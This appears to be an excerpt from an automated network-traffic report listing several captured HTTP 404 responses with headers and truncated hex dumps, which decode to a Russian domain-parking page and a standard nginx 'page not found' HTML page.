Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 04:26:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 04:26:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 04:26:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Nov 2024 04:27:17 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Nov 2024 04:27:19 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Nov 2024 04:27:22 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Nov 2024 04:27:24 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 